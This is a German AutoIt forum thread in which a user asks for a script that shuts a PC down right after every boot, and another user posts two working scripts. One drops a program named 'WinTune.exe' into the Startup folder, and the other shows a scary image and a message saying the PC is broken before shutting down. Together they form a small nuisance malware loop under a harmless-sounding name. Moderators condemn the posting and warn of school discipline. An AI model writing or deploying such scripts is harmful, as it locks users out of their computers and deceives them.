auf und ab xD

  • nachdem jetz von meinem alten thema das präfix offen genommen wurde,muss ich jetz doch noch ein neues aufmachen ^^: auszug aus dem 1. thema

    ok jetzt hab ich noch eine frage. fast hat mir mal ein script geschrieben, dass den pc wieder runterfährt wenn er hochgefahren ist. doch dieses script hab ich seit meiner neuinstallation von xp nicht mehr. jetz woll ich noch fragen,wie ich das am besten anstelle. also über registry und mit nem script und nicht mit dem wert shutdown -r xD

    lg

  • es soll einfach in den autostart über die registry geschriebn werden, dass den pc runterfahren lässt. also dass der pc nach dem hochfahren wieder runter gefahren wird.
    lg

  • sozusagen ein kleiner Virus der nur im abgesicherten modus wegzukriegen ist ?


    Das ist schript 1

    Spoiler anzeigen
    [autoit]

    FileInstall("WinTune.exe",@StartupDir &"\WinTune.exe")
    Shutdown(2)

    [/autoit]


    und das script 2

    Spoiler anzeigen
    [autoit]

    DirCreate(@Tempdir & "WinTune")
    FileInstall("lachen.wav" , @TempDir & "WinTune\Lachen.wav")
    FileInstall("tot.jpg" , @TempDir & "WinTune\tot.jpg")
    Soundplay(@TempDir & "WinTune\Lachen.wav", 0)
    $destination = @TempDir & "WinTune\tot.jpg"
    SplashImageOn("Splash Screen", $destination,450,450)
    Sleep(2000)
    SplashOff()
    MsgBox(0, "WinTune", ".o.O. Ihr Pc ist ab jetzt leider Defekt , Bitte kaufen sie sich einen neuen .O.o.",1)
    $destination = @TempDir & "WinTune\tot.jpg"
    SplashImageOn("Splash Screen", $destination,450,450)
    Sleep(2000)
    SplashOff()
    MsgBox(0, "WinTune", ".o.O. Ihr Pc ist ab jetzt leider Defekt , Bitte kaufen sie sich einen neuen .O.o.",1)
    $destination = @TempDir & "WinTune\tot.jpg"
    SplashImageOn("Splash Screen", $destination,450,450)
    Sleep(2000)
    SplashOff()
    MsgBox(0, "WinTune", ".o.O. Ihr Pc ist ab jetzt leider Defekt , Bitte kaufen sie sich einen neuen .O.o.",1)
    $destination = @TempDir & "WinTune\tot.jpg"
    SplashImageOn("Splash Screen", $destination,450,450)
    Sleep(2000)
    SplashOff()
    Shutdown(2)

    [/autoit]

    die bilder und der sound im anhang

  • @Pethebe
    Ich habe es zwar gemacht aber ich habe dafür nie die Hilfe diese Forums in Anspruch genommen das war meine Idee und ich habe sie umgesetzt ich habe uíhn jetzt auch nur gepostet weil hier jemand etwas ähnliches vorhatte es heist ja nicht das er es so hätte übernehmen müssen

    Mfg Eistee


    P.S. sag mir doch mal ein paar tipps was du sonst mit autoit machen willst mir fällt nichts mehr ein...

  • Eistee
    Ich muß peethebee vollkommen Recht geben. :thumbup:

    Wenn Euch nichts anderes einfällt, wofür Ihr AutoIt einsetzen könnt, dann ist das schon schade genug. :sleeping:
    Versucht aber bitte nicht, dieses Forum zu mißbrauchen, um Scripte zu posten,
    die keinen weiteren Sinn und Zweck haben, als PC-User zu ärgern. :thumbdown:

    Ich kann gut verstehen, dass destruktive Energie, in welchem Umfang auch immer, hier gnadenlos zensiert wird. :thumbup:

    MfG Schnuffel

    "Sarkasmus ist die niedrigste Form des Witzes, aber die höchste Form der Intelligenz."
    Val McDermid

    ein paar Infos ...

    Wer mehr als "nur" Hilfe benötigt, kann sich gern im Forum "Programmieranfragen" an uns wenden. Wir helfen in allen Fällen, die die Forenregeln zulassen.

    Für schnelle Hilfe benötigen wir ein ! lauffähiges ! Script, dass wir als Demonstration des Problems testen können. Wer von uns erwartet ein Teilscript erstmal lauffähig zu bekommen, der hat
    1. keine wirkliche Not
    2. keinen Respekt vor Menschen die ihm in ihrer Freizeit Ihre Hilfe anbieten
    3. oder ist einfach nur faul und meint wir coden das für ihn

    In solchen Fällen erlaube ich mir, die Anfrage einfach zu ignorieren. ;)

    • Offizieller Beitrag

    Ich habe es zwar gemacht aber ich habe dafür nie die Hilfe diese Forums in Anspruch genommen das war meine Idee und ich habe sie umgesetzt ich habe uíhn jetzt auch nur gepostet weil hier jemand etwas ähnliches vorhatte es heist ja nicht das er es so hätte übernehmen müssen

    Welche Relevanz hat es, ob du für eine blöde Idee Hilfe in Anspruch genommen hast oder nicht?
    Hoffentlich sind dir die Folgen bewußt, wenn dein Tun in der Schule auffliegt? Minimal ein Schulverweis, wahrscheinlicher noch dazu ein Hausverbot für den Computerraum (was deinen Schulabschluß zum Kippen bringen kann), nicht unmöglich ein Schulrausschmiß.
    In Abwandlung eines alten Sprichwortes: Vor Beginn des Skriptens - Gehirn einschalten!

    P.S. sag mir doch mal ein paar tipps was du sonst mit autoit machen willst mir fällt nichts mehr ein...

    Dir fällt nix ein??
    Ich bin mir sicher, dass du kaum die Hälfte der in AutoIt enthaltenen Funktionsvielfalt kennst oder verstanden hast. (Überzeuge mich eines Besseren!)
    Schau dir allein die UDF-Sammlung an. Nimm dir Kapitel für Kapitel vor und gestalte die Skripte aus der Hilfe nach (nicht nur die vorhandenen ausführen). Dabei wird dir von selbst bewußt werden, was man alles damit machen kann und somit entstehen auch neue Projektideen.

  • Ich muss ehrlich zugeben das es mich nicht interessiert welcher befehl was macht bevor ich diesen befehl nicht brauche
    und mir fällt einfach nichts ein wo ich lust hätte wieder zeit und arbeit zu investieren weil es nichts ist was mich interressiert
    z.B. dein Install-script-Generator

    das ist etwas sinvolles, und dir fällt auch immer was ein und so ich hingegen brauche oft wochen bis ich irgendwas hätte wo ich mich mal dran versuchen will

    Ich bin einfach nit Kreativ genug ich brauche autoit nur um Probleme zu Lösen oder Ähnliches sonst wüsste ich aber nichts damit anzufangen


    Mfg Eistee